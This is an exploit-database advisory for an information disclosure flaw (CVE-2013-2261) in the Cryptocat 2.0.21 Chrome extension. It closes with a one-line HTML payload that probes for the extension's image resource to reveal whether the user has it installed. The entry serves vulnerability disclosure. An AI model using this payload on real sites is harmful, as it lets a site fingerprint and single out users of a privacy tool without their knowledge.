Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure Vulnerability

2012-11-07T00:00:00
ID EDB-ID:38636
Type exploitdb
Reporter Mario Heiderich
Modified 2012-11-07T00:00:00

Description

Cryptocat Chrome Extension 'img/keygen.gif' File Information Disclosure Vulnerability. CVE-2013-2261. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/61090/info

Cryptocat is prone to an information disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Cryptocat 2.0.21 is vulnerable; other versions may also be affected. 

<img src="chrome-extension://[extension-id-from-chrome-web-
store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) >